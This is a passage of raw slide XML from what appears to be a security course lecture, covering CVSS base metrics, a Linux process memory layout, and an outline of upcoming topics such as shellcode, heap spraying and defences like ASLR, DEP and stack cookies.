              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>separate signal pathway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>most modern processors implement small parts of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" i="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>a modified harvard architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>to support loading a program from disk storage as data, and then executing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="Shape 110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1780888" x="4582235"/>
            <a:ext cy="2612638" cx="4104563"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Shape 505"/>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Vulnerability Scoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Shape 50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Common Vulnerability Scoring System </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.first.org/cvss#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>Six Base metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.first.org/cvss/faq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Access Vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: how well can a remote attack attack the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Access Complexity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the complexity of the attack required to exploit the vuln, once he has gained access to the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the number of times an attacker must authenticate to the target system, in order to exploit the vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Confidentiality Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to confidentiality if the vulnerability is successfully exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Availability Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to availability if the vulnerability is successfully exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Integrity Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to the integrity of data and systems if the vulnerability is successfully exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>There are also Temporal, and Environmental metrics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability Scoring is important for prioritizing incident response, and for system administrators to  prioritize proactive security measures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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Shape 51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Next Time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Shape 51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lang="en"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Heapspray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Real World Countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stack Cookies </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(/GS Protection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And how to get around them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="513" name="Shape 513"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="2899429" x="4093137"/>
            <a:ext cy="3645459" cx="4593662"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Shape 518"/>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Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Shape 524"/>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Linux process memory layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Shape 52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Program scratch space </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>return instruction pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uninitialized global &amp; static vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>named BSS by old convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Initialized global &amp; static variables </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rPr lang="en"/>
              <a:t>machine instructions / code segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Shape 526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="4722769"/>
            <a:ext cy="4770899" cx="2050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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Shape 527"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1767950" x="6841550"/>
            <a:ext cy="416699" cx="1494300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 528"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1775825" x="6810075"/>
            <a:ext cy="393299" cx="1793099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="Shape 529"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6195425" x="6810075"/>
            <a:ext cy="393299" cx="1793099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="530" name="Shape 530"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1972425" x="3027175"/>
            <a:ext cy="534899" cx="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="531" name="Shape 531"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="526" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600449" x="2125069"/>
            <a:ext cy="542700" cx="2597699"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
